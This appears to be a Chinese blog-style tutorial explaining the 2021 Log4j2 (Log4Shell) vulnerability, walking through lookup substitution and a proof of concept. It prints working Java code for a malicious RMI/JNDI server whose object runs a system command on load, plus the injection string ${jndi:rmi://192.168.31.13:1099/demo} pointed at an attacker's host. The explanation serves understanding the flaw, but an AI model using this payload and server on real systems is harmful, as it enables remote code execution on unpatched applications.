Log4j是Apache软件基金会下的一个开源项目，通过使用log4j可以打印程序日志输出信息到控制台，文件等各种地方。简单来说，它是一个用于记录日志的Java第三方库，而且使用量非常广泛。

在2021年12月9日，Log4j2爆出极其严重的漏洞，攻击者只需要构造恶意数据植入日志记录中，就可以导致任意代码执行，危害极大，利用门槛极低。

Log4j2漏洞形成原理

Log4j2中提供了一种叫lookups的功能，这个功能很强大，可以把 {} 部分进行替换

public class Main {
    private static  final  Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        String content = "world";
        logger.trace("hello {}",content);

        //https://logging.apache.org/log4j/2.x/manual/lookups.html
        String content2 = "${java:os}";
        logger.trace("hello {}",content2);
        String content3 = "${java:vm}";
        logger.trace("hello {}",content3);
    }
}

打印结果：

2021-12-11 20:03:29.751 [main] TRACE [13] - hello world
2021-12-11 20:03:29.755 [main] TRACE [17] - hello Windows 10 10.0, architecture: amd64-64
2021-12-11 20:03:29.756 [main] TRACE [19] - hello Java HotSpot(TM) 64-Bit Server VM (build 25.261-b12, mixed mode)

这还不要紧，它还支持 JNDI lookup 就很要命了

本地启动一个JNDI服务看看

public class SimpleJndiServer {
    public static void main(String[] args) {
        try {
            Registry registry = LocateRegistry.createRegistry(1099);
            System.out.println("create rmi 1099");
            Reference reference = new Reference("com.skyline.log4j2.demo.jndi.JndiObj", "com.skyline.log4j2.demo.jndi.JndiObj", null);
            ReferenceWrapper wrapper = new ReferenceWrapper(reference);
            registry.bind("demo", wrapper);
        } catch (RemoteException | NamingException | AlreadyBoundException e) {
            e.printStackTrace();
        }
    }
}
public class JndiObj implements ObjectFactory {

    static {
        System.out.println("this is JndiObj,i'm here!");
        try {
            //打开远程链接
            Runtime.getRuntime().exec("mstsc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    private String name;

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return new JndiObj();
    }

    @Override
    public String toString() {
        return "JndiObj{" +
                "name='" + name + '\'' +
                '}';
    }
}

写入日志：

public class Main {
    private static  final  Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        //JNDI注入参考链接
        //https://blog.csdn.net/caiqiiqi/article/details/105976072
        //192.168.31.13为客户端ip（攻击者ip），不是服务ip
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        String content4 = "${jndi:rmi://192.168.31.13:1099/demo}";
        logger.trace("hello {}",content4);
    }
}

可以看到这次我日志中的内容变成了${jndi:rmi://192.168.31.13:1099/demo}，这里需要注意的是192.168.31.13是我的本机ip，也就是攻击者的ip。会弹出一个远程连接的命令。

整理利用流程：${jndi:rmi://192.168.31.13:1099/demo}被打印到日志中，会被lookup会对其进行解析，并替换解析后的值，插入到记录语句中。

很多时候我们记录在日志中的动态参数都是对象，这些对象可能是从前端或者别的服务请求过来的。比如一个登录接口，如果User对象中的userName的值就是我们上面写的${jndi:rmi://192.168.31.13:1099/demo}，那后果真的是不堪设想